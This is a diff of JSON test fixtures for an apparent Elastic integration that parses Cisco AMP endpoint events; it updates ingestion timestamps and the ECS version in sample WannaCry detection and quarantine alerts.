@@ -1231,7 +1231,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843528155Z", + "ingested": "2021-09-13T18:07:04.510354257Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526292\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1286,7 +1286,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1306,7 +1306,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843558928Z", + "ingested": "2021-09-13T18:07:04.510356238Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526291\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1361,7 +1361,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1381,7 +1381,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843562131Z", + "ingested": "2021-09-13T18:07:04.510358126Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526288\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1436,7 +1436,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1456,7 +1456,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843564045Z", + "ingested": "2021-09-13T18:07:04.510360004Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526287\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1511,7 +1511,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1531,7 +1531,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843565954Z", + "ingested": "2021-09-13T18:07:04.510361876Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526286\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1586,7 +1586,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1606,7 +1606,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843567900Z", + "ingested": "2021-09-13T18:07:04.510363767Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558988\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1661,7 +1661,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1681,7 +1681,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843569770Z", + "ingested": "2021-09-13T18:07:04.510365640Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558989\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1736,7 +1736,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1756,7 +1756,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843571678Z", + "ingested": "2021-09-13T18:07:04.510367543Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558987\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1811,7 +1811,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1831,7 +1831,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843573820Z", + "ingested": "2021-09-13T18:07:04.510369477Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558986\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1886,7 +1886,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1906,7 +1906,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843575704Z", + "ingested": "2021-09-13T18:07:04.510371353Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558985\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1961,7 +1961,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1981,7 +1981,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843595495Z", + "ingested": "2021-09-13T18:07:04.510373257Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -2045,7 +2045,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2075,7 +2075,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843599818Z", + "ingested": "2021-09-13T18:07:04.510375122Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":461000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -2141,7 +2141,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2171,7 +2171,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843601745Z", + "ingested": "2021-09-13T18:07:04.510376987Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":430000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -2239,7 +2239,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2271,7 +2271,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843603663Z", + "ingested": "2021-09-13T18:07:04.510378867Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":327000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -2339,7 +2339,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2371,7 +2371,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843605546Z", + "ingested": "2021-09-13T18:07:04.510380745Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":313000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -2428,7 +2428,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2448,7 +2448,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843607426Z", + "ingested": "2021-09-13T18:07:04.510382667Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -2499,7 +2499,7 @@ } 